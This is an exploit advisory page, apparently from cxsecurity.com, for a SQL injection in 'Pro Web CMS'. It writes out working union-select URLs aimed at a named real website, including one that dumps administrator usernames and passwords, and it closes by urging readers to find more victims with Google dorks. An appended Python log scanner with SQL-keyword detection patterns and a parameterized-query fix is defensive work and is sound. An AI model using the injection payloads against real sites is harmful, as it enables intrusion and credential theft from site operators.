Pro Web CMS SQL Injection Vulnerability

2016.08.13
N_H (IR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title : Pro Web CMS SQL Injection Vulnerability
# Exploit Author : N_H
# Date : 2016/08/13
# Tested on : MacOS , Windows , Ubuntu
# Google Dork : No
# Home Page : https://www.prowebghana.net
# Web Server : Apache
# Category : Web Application
# Discovered by : N_H
# Description : One SQL injection vulnerability was discovered in ProWeb CMS websites by N_H. This vulnerability affects all websites of this United Kingdom CMS. Thousands of websites in the world now run on this content management system (CMS).
# For example, one of the sites vulnerable to this bug that we investigated ...
--------------------------------------------------------------------------------------------------
Target : http://www.ghanawildlifesociety.org
Vulnerable Location : http://www.ghanawildlifesociety.org/web.php?id=32
Columns Number : http://www.ghanawildlifesociety.org/web.php?id=32+order+by+3--
Tables of website : http://www.ghanawildlifesociety.org/web.php?id=32+union+select+group_concat%28Table_name%29,2,3+from+information_schema.tables+where+table_schema=database%28%29--+
User and Password of Administrator : http://www.ghanawildlifesociety.org/web.php?id=32+union+select+group_concat%280x3c62723e%20,name,0x3a,Pass%29,2,3+from+user--+
--------------------------------------------------------------------------------------------------
# Warning : You can find more vulnerable websites of this CMS with your creative Google Dorks and other ways.
# We are : Nobody
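For operators of affected sites, the requests listed above leave a recognisable trace in the Apache access log: a numeric `id` parameter that carries SQL keywords. The following is an added detection example, not part of the original advisory or of the CMS; the log lines are constructed samples in Apache common log format, and the function names and client addresses are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

# SQL constructs seen in the advisory's requests; a numeric id never needs them.
SQLI_RE = re.compile(
    r"\bunion\s+(?:all\s+)?select\b|\border\s+by\s+\d+|\binformation_schema\b"
    r"|\bgroup_concat\s*\(|--\s*$|\b0x[0-9a-f]{4,}\b",
    re.IGNORECASE,
)

def suspicious_id(line, param="id"):
    """Return (client, status, decoded value) if the id parameter carries SQL, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _ts, target, status = m.groups()
    # parse_qsl percent-decodes and maps '+' to a space, as PHP does when filling $_GET.
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if key == param and not value.strip().isdigit() and SQLI_RE.search(value):
            return client, int(status), value
    return None

def scan(lines):
    """Return one hit per log line whose id parameter looks like an injection attempt."""
    return [hit for hit in map(suspicious_id, lines) if hit]

# Constructed sample log lines (addresses are from documentation ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Aug/2016:10:00:01 +0000] "GET /web.php?id=32 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Aug/2016:10:02:11 +0000] "GET /web.php?id=32+order+by+3-- HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Aug/2016:10:02:40 +0000] "GET /web.php?id=32+union+select+'
    'group_concat%28Table_name%29,2,3+from+information_schema.tables+where+'
    'table_schema=database%28%29--+ HTTP/1.1" 200 6011',
    '198.51.100.7 - - [13/Aug/2016:10:03:00 +0000] "GET /news.php?title=union+select+committee HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, status, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} id={value!r}")
```

A hit with status 200 on `web.php` means the request reached the application; the underlying fix is to treat `id` strictly as an integer and pass it to the database through a parameterized query.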


Copyright 2024, cxsecurity.com

 
